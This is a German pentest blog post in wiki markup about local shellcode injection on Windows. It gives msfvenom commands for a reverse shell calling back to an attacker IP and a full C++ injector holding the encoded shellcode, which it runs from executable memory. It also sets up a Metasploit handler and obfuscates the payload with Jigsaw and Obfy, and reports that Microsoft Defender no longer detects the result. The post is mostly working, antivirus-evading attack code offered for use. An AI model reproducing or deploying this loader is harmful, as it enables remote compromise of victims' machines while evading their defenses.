it-security:blog:shellcode_injection-1

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 +{{tag>it-security windows kali pentest blog deutsch}}
 +====== Shellcode Injection Teil 1 ======
  
 +In dieser Beitragsreihe beschäftigen wir uns mit Shellcode, wie man diesen in Prozesse einschleust und einigen Techniken zur Verschleierung der Binärdateien. Im ersten Teil schauen wir uns an, wie man Shellcode aus einem lokalen Prozess heraus ausführt.((https://www.ired.team/offensive-security/code-injection-process-injection/process-injection)) Zusätzlich verschleiern wir das Programm so, dass der Defender es nicht mehr als Bedrohung erkennt.
 +
 +Alle benötigten Dateien findet ihr im [[it-security:blog:shellcode_injection-1#Repository|Repository]]
 +\\
 +\\
 +===== Shellcode generieren =====
 +
 +{{page>vorlagen:attention}}
 +
 +{{:it-security:shellcode-part1.jpg?900|}}
 +
 +Den Shellcode generieren wir mit ''msfvenom'' und nutzen folgende Parameter:
 +
 +^ Parameter ^ Beschreibung ^
 +| -p - Payload | x86 Reverse Shell |
 +| LHOST | IP des Angreifers |
 +| LPORT | Listening Port des Angreifers |
 +| -b - Bad Chars  | Spezielle Zeichen müssen wir rausfiltern, da sie den Shellcode unbenutzbar machen |
 +| -e - Encode Shellcode | Wir enkodieren unseren Shellcode |
 +| -i - Iterations | Gibt die Anzahl der Enkodierungsvorgänge an |
 +| -f - Format | Die Ausgabe soll im C-Format sein |
 +| > shell.c | Speichere in die Datei shell.c |
 +
 +<code bash>
 +msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -e x86/shikata_ga_nai -i 8 -b '\x00\x0d\x0a' -f c > shell.c
 +</code>
 +\\
 +\\
 +===== C++ Injector =====
 +
 +Wir erstellen uns ein neues C++ Projekt und fügen den Shellcode ein. Zusätzlich brauchen wir die Größe der Bytes. Diese entnehmen wir der ''msfvenom'' Ausgabe.
 +
 +<file cpp local-process-injection.cpp>
 +#include <stdio.h>
 +#include <Windows.h>
 +
 +//shell.c
 +unsigned const char payload[] = 
 +"\xd9\xe9\xbb\x1b\x2c\xe5\xd6\xd9\x74\x24\xf4\x5a\x2b\xc9"
 +"\xb1\x81\x83\xc2\x04\x31\x5a\x14\x03\x5a\x0f\xce\x10\x6e"
 +"\xce\xb6\xb5\x28\xcb\x04\x90\x43\xcf\x7e\x78\x9f\xc6\xce"
 +"\x05\x5c\x33\xcc\xcb\x21\xd3\x2e\x6f\xb6\xd0\x7d\xda\xd1"
 +"\xaf\xa7\x1c\xd8\xfb\xa2\x94\xd6\xb1\xf3\x25\xe5\x3e\xdb"
 +"\x7d\x58\xb1\x51\x2d\x07\x37\x6d\x9b\x0b\xbe\x1c\x57\xcb"
 +"\x7f\x5d\x32\xd5\xd1\x71\x14\x2e\x07\xef\x45\x69\x0c\x3e"
 +"\x8d\xca\xb1\x7d\xc4\x07\x4f\xf7\xd8\xe8\x37\x33\xeb\x67"
 +"\xd8\x97\xb6\xf5\xbf\xde\xb3\xd9\x6a\xf1\x94\x7b\x68\x21"
 +"\xcc\xab\xda\xcd\xd1\x43\xef\x4e\x2a\x1d\xd1\xb7\xec\x24"
 +"\x62\x0b\xc5\x61\x48\xe2\x7c\x9e\x54\x9f\x2d\x8c\x38\x09"
 +"\x23\x13\xb2\x6d\x6f\xe8\xdc\xad\xe3\x99\x14\x89\xca\x07"
 +"\x67\xf2\x09\xdb\x2e\x38\x9f\x2c\xc4\x12\xf5\x18\x94\xf5"
 +"\xb1\xed\x84\x6f\xfe\xbb\x23\xf4\xae\x10\x62\x2f\x63\x2b"
 +"\x6a\x3c\x22\x7a\xd3\x96\x15\x99\xb0\x62\x38\xbe\x93\x1e"
 +"\x72\xcc\xe3\xef\xa9\x9a\xaa\xc9\xda\xd5\x09\xed\x4f\xb2"
 +"\x61\x18\x48\x9c\x0b\x45\xcb\xab\xaf\x91\x20\xc2\x66\x39"
 +"\xac\x66\xd2\x21\x83\x13\xb4\x12\xcb\x39\x55\x20\x19\xff"
 +"\xa3\x8b\xaa\x6e\x3e\x90\x31\x49\x19\x74\x7f\x1f\x89\xfe"
 +"\x89\xdd\x65\xa2\x5b\xa0\x13\xe4\x6b\x18\x99\xde\xfc\x63"
 +"\x9e\x9b\x7b\x6d\x65\x6d\xf4\x5b\x39\x08\x89\xb1\x85\xd8"
 +"\x6a\x29\x88\x5a\xdd\x14\x8e\xb9\xc0\xae\x63\x89\xbe\x13"
 +"\xa6\xf3\xc2\x19\xa8\x41\x5d\xf7\x11\x02\x45\xd3\xec\xa1"
 +"\x88\x13\x57\xb7\x0b\x7d\x79\x5a\x0c\x60\xde\x6b\x6c\x4c"
 +"\x61\xe3\x74\x88\xbd\x6a\xda\x43\xca\xb8\xe4\x07\xd4\x5a"
 +"\x92\x04\xd9\x18\xb0\x57\x8d\xf3\x87\x65\x56\x06\x21\xb3"
 +"\x02\x9b\xc4\x87\x56\xed\x6b\xef\xbb\x9f\x21\xbf\x7f\x12"
 +"\x4d\x3b\xdc\xf7\x4c\xc6\xf5\xe7\x30\x05\x87\x7f\x7c\x19"
 +"\x72\x86\x62\xc4\x7a\x8f\xd6\xc9\x19\xe8\x6e\xa7\x54\x04"
 +"\xd9\xbf\x94\x69\xeb\x41\x64\xac\xd5\xe4\x47\xfe\x5d\x2d"
 +"\x90\xf9\xea\x18\x62\x76\x01\xe6\xc3\xe5\xd6\xfa\x32\x22"
 +"\xc0\xf6\x86\x5f\x16\x3a\x4a\x1e\x59\xe3\x0c\x4b\x69\xd2"
 +"\x6d\x80\xef\x45\x49\xc2\x36\xe5\x78\x72\x55\xf3\x4d\xbe"
 +"\xbb\xac\x88\xcc\x8d\xcb\xc1\x6f\x40\xd7\x54\x7e\xa2\x5d"
 +"\xcc\x6a\xdc\x99\x59\x67\x84\xb4\x05\xba\x33\x43\x48\xb5"
 +"\x9b\x22\xa7\xc6\x06\xf6\x36\x3f\x4b\x29\xf8\x66\xa8\xfb"
 +"\x55\x5f\x07\xa4\xfd\x5f\x98\x69\x71\xcc\xb6\x2f\x6e\x9d"
 +"\xf1\xe6\x99\x70\x04\x05\x47\xb3\x1e\xe3\xb7\xa9\x6f\x42"
 +"\xb1\xda\xeb\x37\x61\x5e\x20\x23";
 +
 +//size is given by msfvenom after shellcode creation
 +size_t size = 540;
 +
 +int main(int argc, char** argv) { 
 + char* code;    
 + printf("#nosoc - expecttheunexpected");
 + code = (char*)VirtualAlloc(NULL, size, MEM_COMMIT,PAGE_EXECUTE_READWRITE); 
 + memcpy(code, payload, size); 
 + ((void(*)())code)();
 + return(0);
 +}
 +</file>
 +\\
 +\\
 +==== Shellcode analysieren ====
 +
 +Nach dem Kompilieren, laden wir ''inject.exe'' im Debugger und schauen uns den Shellcode genau an. Dies verschafft uns einen groben Überblick über die Funktionsweise.
 +
 +[{{:it-security:inject-shellcode-5.png?600|Shellcode im Debugger}}]
 +\\
 +\\
 +==== Metasploit vorbereiten ====
 +
 +Nun starten wir einen Handler in Metasploit, der die Reverse-Shell annimmt.
 +
 +<code ruby>
 +msf6 > use exploit/multi/handler
 +[*] Using configured payload generic/shell_reverse_tcp
 +msf6 exploit(multi/handler) > set lport 445
 +lport => 445
 +msf6 exploit(multi/handler) > set lhost 172.23.61.130
 +lhost => 172.23.61.130
 +msf6 exploit(multi/handler) > exploit
 +
 +[*] Started reverse TCP handler on 172.23.61.130:445
 +</code>
 +\\
 +\\
 +==== Shellcode ausführen ====
 +
 +Wir starten jetzt ''Inject.exe'', betrachten die Ausgabe in Metasploit und die Prozessdetails auf der Opfer-Maschine.
 +
 +[{{:it-security:inject-shellcode-4.png?600|Reverse-Shell auf der Angreifer-Maschine}}]
 +
 +[{{:it-security:inject-shellcode-3.png?600|TCP Verbindung von Inject.exe}}]
 +\\
 +\\
 +===== Unter dem Defender-Radar =====
 +
 +''Inject.exe'' wird natürlich recht einfach durch Antivirensoftware erkannt. Wir müssen den Shellcode somit tarnen. Das machen wir mit dem Tool jigsaw ((https://github.com/RedSiege/Jigsaw)) und dem Framework Obfy.
 +\\
 +\\
 +==== Shellcode tarnen - Jigsaw ====
 +
 +Zuerst erstellen wir den Shellcode im Raw Format:
 +
 +<code bash>
 +msfvenom -p windows/shell_reverse_tcp LHOST=172.23.61.130 LPORT=445 -e x86/shikata_ga_nai -i 8 -b '\x00\x0d\x0a' -f raw > shell.raw
 +</code>
 +
 +Dann übergeben wir diesen an Jigsaw:
 +
 +<code dos>
 +python3 jigsaw.py shell.raw
 +</code>
 +
 +und erhalten eine Datei mit C++ Code.
 +
 +<code c++>
 +unsigned char jigsaw[540] = { 0x32, 0x87, 0xbe, 0x4b, 0x6c, 0xad, 0xc2, 0xd3, 0xd5, 0x21, 0x1c, 0x57, 0x93, 0xae, 0x39, 0x2c, 0x27, 0xce, 0xeb, 0x99, 0xa8, 0xf4, 0xbf, 0x14, 0x31, 0x2a,
 +...
 +401, 459, 65, 118, 356, 42, 182, 220 };
 +
 +
 +int calc_len = 540;
 +unsigned char calc_payload[540] = { 0x00 };
 +int position;
 +
 +// Reconstruct the payload
 +for (int idx = 0; idx < sizeof(positions) / sizeof(positions[0]); idx++) {
 + position = positions[idx];
 + calc_payload[position] = jigsaw[idx];
 +}
 +</code>
 +
 +<file c++ Inject.cpp>
 +#include <stdio.h>
 +#include <Windows.h>
 +
 +size_t size = 540;
 +
 +unsigned char jigsaw[540] = { 0x32, 0x87, 0xbe, 0x4b, 0x6c, 0xad, 0xc2, 0xd3, 0xd5, 0x21, 0x1c, 0x57, 0x93, 0xae, 0x39, 0x2c, 0x27, 0xce, 0xeb, 0x99, 0xa8, 0xf4, 0xbf, 0x14, 0x31, 0x2a, 0xc5, 0xeb, 0x48, 0x11, 0xd8, 0x49, 0xf0, 0x93, 0x5b, 0xb9, 0x69, 0xf8, 0x73, 0x80, 0xe4, 0x3f, 0xa6, 0xa6, 0x3a, 0xf5, 0x56, 0x12, 0x7c, 0xe4, 0x72, 0xbb, 0x13, 0x5b, 0xc5, 0x40, 0xf0, 0x01, 0x6f, 0x0b, 0x35, 0xc2, 0x1c, 0x2d, 0x76, 0xeb, 0x9e, 0xd8, 0xd6, 0x39, 0x7c, 0x61, 0x7e, 0xc7, 0x16, 0x69, 0x0e, 0x1c, 0x78, 0xb0, 0xa3, 0x36, 0x5b, 0x6f, 0xbc, 0xa0, 0x2e, 0x63, 0xe4, 0x7f, 0xea, 0x13, 0x2c, 0xaa, 0x6c, 0xbf, 0xdb, 0x4a, 0x69, 0xaa, 0x4d, 0x71, 0xd6, 0x4c, 0x61, 0x65, 0x59, 0xc3, 0x5f, 0x43, 0xf3, 0x94, 0xdf, 0x59, 0x8d, 0xbb, 0x25, 0x8f, 0x6f, 0x17, 0x1d, 0xd7, 0xa1, 0xef, 0x9b, 0xe0, 0x31, 0x15, 0x36, 0xe2, 0x5c, 0xa5, 0x94, 0x60, 0x01, 0x2b, 0x08, 0x01, 0x9f, 0xa1, 0x14, 0x2b, 0x86, 0x1f, 0xbf, 0xd1, 0x0f, 0xbf, 0x03, 0x28, 0xc1, 0x10, 0x4d, 0x66, 0x32, 0xd0, 0xcb, 0x4e, 0x34, 0xdf, 0xeb, 0x99, 0xf2, 0x14, 0x3f, 0x4c, 0xf8, 0xed, 0xc1, 0xbd, 0x0e, 0x9b, 0xc1, 0x57, 0xd5, 0x1d, 0x01, 0xf5, 0x79, 0xd1, 0xc4, 0xea, 0xc0, 0xcf, 0x0c, 0xea, 0x05, 0x9d, 0x8c, 0x8d, 0x9a, 0x2d, 0x94, 0x5b, 0x05, 0xde, 0x37, 0xa6, 0x17, 0x80, 0x07, 0x83, 0x6a, 0x2d, 0xe4, 0xd5, 0xc3, 0x85, 0x71, 0x2a, 0xa4, 0x3d, 0xf6, 0x5c, 0xc8, 0x6c, 0x6a, 0x86, 0xf3, 0x5c, 0x67, 0x4d, 0xdc, 0x11, 0xff, 0x81, 0xce, 0x3b, 0x9c, 0x4d, 0x98, 0xe8, 0xd4, 0x6a, 0x3e, 0x4b, 0x51, 0xd5, 0x4c, 0xfc, 0xe4, 0x8e, 0x6a, 0xc1, 0x63, 0x54, 0x7f, 0x61, 0xa4, 0x42, 0x60, 0xb5, 0x4d, 0x92, 0xd9, 0x08, 0x22, 0x23, 0xbe, 0x82, 0x9f, 0x4c, 0xeb, 0x8c, 0x3a, 0x6e, 0x88, 0xd0, 0x5a, 0xe0, 0xae, 0x42, 0x38, 0x4d, 0x31, 0xd0, 0xe6, 0x72, 0x54, 0xb3, 0x2b, 0x8d, 0x2f, 0xca, 0x38, 0x92, 0xe6, 0x38, 0xfd, 0xa1, 0x9c, 0x70, 0xd0, 0xe5, 0xb5, 0xff, 0xe1, 0x0e, 0x81, 0x4a, 0xc5, 0x67, 0x57, 0x3a, 0x33, 0xa0, 0xc8, 0x7f, 0xe6, 0x6c, 0xf1, 0x77, 0x3d, 0xdd, 0x63, 0xa1, 0xf9, 0x4f, 0x99, 0xf1, 0x8a, 0xb3, 0x60, 0xf6, 0xae, 0x86, 0xd5, 0x3e, 0x61, 0xc4, 0x93, 0xd9, 0x2d, 0xbe, 0xe2, 0xf0, 0xec, 0x13, 0x85, 0x91, 0x8a, 0x95, 0x37, 0x9f, 0x41, 0x43, 0x3c, 0xda, 0x81, 0xb3, 0xf5, 0xa9, 0x5f, 0x3e, 0x06, 0x0e, 0x47, 0x03, 0x5e, 0x28, 0xec, 0x54, 0x9f, 0x95, 0xca, 0x59, 0xee, 0x9a, 0xd2, 0xe5, 0xa4, 0x32, 0xcf, 0xb9, 0xe5, 0xd8, 0x78, 0xe8, 0xb1, 0xa5, 0xee, 0xe5, 0x4e, 0x2c, 0x8b, 0xc3, 0x5b, 0x7d, 0x23, 0x18, 0x64, 0xda, 0x56, 0x59, 0xa9, 0x95, 0x6f, 0x9e, 0x9b, 0x3c, 0xcb, 0x2a, 0x54, 0x6a, 0x5c, 0x25, 0xf6, 0xc1, 0xf9, 0x5c, 0xab, 0xe5, 0xd0, 0x8b, 0xdd, 0xd0, 0x74, 0xda, 0x68, 0x09, 0x52, 0x25, 0xd0, 0xa9, 0xd1, 0xba, 0x9f, 0xcd, 0x41, 0x54, 0x15, 0x12, 0xba, 0xd2, 0xd5, 0xdd, 0x35, 0x76, 0xa8, 0x5a, 0xdc, 0xf0, 0xdb, 0xbd, 0x32, 0x47, 0x6d, 0x4b, 0x89, 0x17, 0xa1, 0x80, 0x46, 0x65, 0x51, 0x4b, 0xca, 0xeb, 0xa4, 0x0c, 0xd9, 0x3c, 0xf4, 0x1e, 0x39, 0xd4, 0x87, 0x91, 0x91, 0xbd, 0x75, 0x24, 0x7a, 0x7b, 0x79, 0x25, 0x7e, 0x2d, 0xc9, 0xd4, 0x73, 0x47, 0x05, 0xe4, 0xed, 0x24, 0x10, 0xbe, 0x15, 0xa5, 0xb0, 0x3a, 0x43, 0x9e, 0xc3, 0xef, 0x5d, 0x57, 0xfe, 0xeb, 0x75, 0x85, 0x11, 0xe7, 0x50, 0xc7, 0x9c, 0x6f, 0xe1, 0x7b, 0x63, 0xcb, 0xbe, 0x17, 0xeb, 0x1e, 0x34, 0x91, 0xf9, 0x50, 0xe5, 0x28, 0x74, 0x9f, 0x3e, 0xe0, 0xe8, 0x83, 0x36, 0xc0, 0x08, 0xcd, 0x8f, 0xa7, 0xb8, 0x32, 0xf4, 0x01, 0x96, 0xd2 };
 +
 +int positions[540] = { 105, 216, 295, 137, 269, 55, 488, 354, 384, 2, 398, 471, 219, 72, 377, 123, 197, 188, 243, 161, 169, 79, 290, 454, 387, 527, 480, 412, 178, 329, 267, 441, 492, 416, 103, 196, 83, 275, 539, 26, 391, 125, 203, 59, 153, 76, 349, 402, 202, 142, 68, 1, 18, 288, 106, 62, 291, 281, 107, 365, 35, 223, 358, 117, 503, 427, 506, 181, 63, 408, 525, 176, 313, 23, 417, 311, 195, 89, 122, 522, 494, 170, 152, 20, 304, 227, 150, 29, 460, 319, 228, 312, 376, 36, 256, 24, 37, 320, 518, 514, 355, 443, 43, 64, 128, 483, 470, 462, 11, 224, 212, 75, 345, 465, 115, 110, 138, 380, 190, 333, 323, 501, 149, 455, 226, 209, 16, 361, 508, 54, 139, 232, 373, 370, 236, 207, 394, 238, 34, 532, 395, 531, 489, 177, 415, 453, 495, 155, 302, 318, 218, 330, 116, 242, 435, 346, 334, 154, 449, 475, 104, 464, 450, 292, 307, 126, 71, 482, 509, 258, 353, 348, 45, 372, 463, 485, 505, 414, 276, 86, 6, 298, 383, 347, 201, 409, 498, 478, 366, 331, 88, 134, 324, 95, 111, 397, 425, 51, 259, 315, 102, 22, 337, 237, 241, 82, 526, 444, 278, 120, 456, 273, 167, 419, 251, 484, 270, 423, 77, 211, 184, 375, 156, 473, 466, 15, 519, 407, 185, 92, 91, 523, 221, 49, 371, 338, 277, 516, 250, 143, 406, 147, 225, 515, 70, 252, 193, 367, 486, 504, 434, 440, 437, 350, 271, 282, 205, 166, 511, 248, 191, 404, 369, 279, 424, 336, 266, 90, 474, 533, 260, 389, 235, 151, 368, 457, 164, 436, 140, 468, 335, 386, 325, 213, 360, 41, 189, 538, 310, 200, 157, 421, 93, 287, 112, 280, 289, 528, 305, 73, 100, 231, 517, 165, 12, 136, 210, 496, 314, 244, 422, 58, 97, 426, 481, 96, 420, 530, 253, 439, 382, 309, 127, 46, 33, 113, 513, 390, 4, 222, 520, 27, 472, 284, 296, 192, 268, 21, 357, 306, 497, 130, 98, 163, 67, 80, 317, 467, 249, 99, 274, 493, 234, 438, 392, 217, 262, 19, 146, 160, 133, 124, 430, 114, 159, 186, 374, 174, 403, 411, 299, 447, 499, 158, 378, 148, 381, 458, 14, 78, 272, 264, 442, 109, 429, 255, 171, 246, 57, 162, 500, 535, 339, 198, 48, 84, 17, 145, 74, 431, 534, 294, 477, 461, 87, 206, 131, 328, 53, 388, 168, 293, 490, 359, 5, 362, 8, 129, 32, 239, 400, 510, 326, 183, 240, 405, 285, 173, 340, 135, 364, 50, 172, 537, 180, 132, 214, 141, 507, 47, 199, 343, 432, 108, 521, 229, 451, 28, 247, 101, 187, 303, 69, 418, 352, 342, 179, 265, 233, 61, 7, 31, 10, 263, 44, 283, 39, 410, 300, 0, 230, 9, 38, 445, 121, 119, 175, 399, 13, 208, 297, 479, 413, 81, 446, 316, 428, 452, 448, 385, 30, 322, 512, 487, 25, 286, 94, 66, 341, 476, 3, 351, 433, 469, 245, 52, 301, 396, 60, 40, 215, 332, 524, 344, 502, 363, 261, 491, 85, 536, 204, 308, 393, 529, 327, 254, 56, 321, 257, 194, 379, 144, 401, 459, 65, 118, 356, 42, 182, 220 };
 +
 +
 +int calc_len = 540;
 +unsigned char calc_payload[540] = { 0x00 };
 +int position;
 +
 +int main(int argc, char** argv) { 
 +
 + char* code;    
 +
 + printf("#nosoc - expecttheunexpected");
 +
 + // Reconstruct the payload
 + for (int idx = 0; idx < sizeof(positions) / sizeof(positions[0]); idx++) {
 + position = positions[idx];
 + calc_payload[position] = jigsaw[idx];
 + }
 + code = (char*)VirtualAlloc(NULL, size, MEM_COMMIT,PAGE_EXECUTE_READWRITE); 
 +
 + memcpy(code, calc_payload, size); 
 +
 + ((void(*)())code)();
 +
 +
 + return(0);
 +}
 +</file>
 +
 +Jigsaw allein reicht an dieser Stelle jedoch nicht, da der Defender die Datei immer noch erkennt.
 +
 +{{:it-security:inject-shellcode-6.png?600|}}
 +\\
 +\\
 +==== Obfy - Verschleierung während des Kompilierens ====
 +
 +Hier können wir das sogenannte Template Metaprogramming anwenden. Hierbei werden Quellcode Dateien während des Kompiliervorgangs erzeugt, welche die Binärdatei mit jedem Vorgang anders aussehen lässt. ((https://0xpat.github.io/Malware_development_part_6/))((https://www.fo-sec.com/articles/10-defender-bypass-methods#3))
 +
 +Hierzu laden wir uns [[https://github.com/fritzone/obfy|Obfy]] herunter, binden die Headerdatei in unser Projekt ein und setzen die Makroanweisungen, zum Starten und Beenden der Code-Verschleierung.
 +
 +<code c++ [enable_line_numbers="true",highlight_lines_extra="3,22,27"]>
 +#include <stdio.h>
 +#include <Windows.h>
 +#include "instr.h"
 +
 +size_t size = 540;
 +
 +unsigned char jigsaw[540] = { ... };
 +
 +int positions[540] = { ... };
 +
 +int calc_len = 540;
 +unsigned char calc_payload[540] = { 0x00 };
 +int position;
 +
 +int main(int argc, char** argv) { 
 +
 + char* code;    
 +
 + printf("#nosoc - expecttheunexpected");
 +
 + // Reconstruct the payload
 +        OBF_BEGIN
 + for (int idx = 0; idx < sizeof(positions) / sizeof(positions[0]); idx++) {
 + position = positions[idx];
 + calc_payload[position] = jigsaw[idx];
 + }
 +        OBF_END
 + code = (char*)VirtualAlloc(NULL, size, MEM_COMMIT,PAGE_EXECUTE_READWRITE); 
 +
 + memcpy(code, calc_payload, size); 
 +
 + ((void(*)())code)();
 +
 +
 + return(0);
 +}
 +</code>
 +\\
 +\\
 +===== Ergebnis =====
 +
 +Wir kompilieren unseren Code und prüfen mit ''ThreatCheck'', ob unsere Datei erkannt wird.
 +
 +[{{:it-security:inject-shellcode8.png?600|Es wurden keine Bedrohungen gefunden}}]
 +
 +[{{:it-security:inject-shellcode-7.png?600|Die Ausführung funktioniert auch weiterhin}}]
 +\\
 +\\
 +===== Repository =====
 +
 +<code bash>
 +git clone https://github.com/psycore8/nosoc-shellcode
 +</code>
 +\\
 +\\
 +===== Ausblick =====
 +
 +In Teil 2 beschäftigen wir uns damit den Shellcode in einen Remote Prozess zu injecten.
 +\\
 +\\
 +~~DISCUSSION~~
  • it-security/blog/shellcode_injection-1.txt
  • Zuletzt geändert: 2024/04/26 14:00
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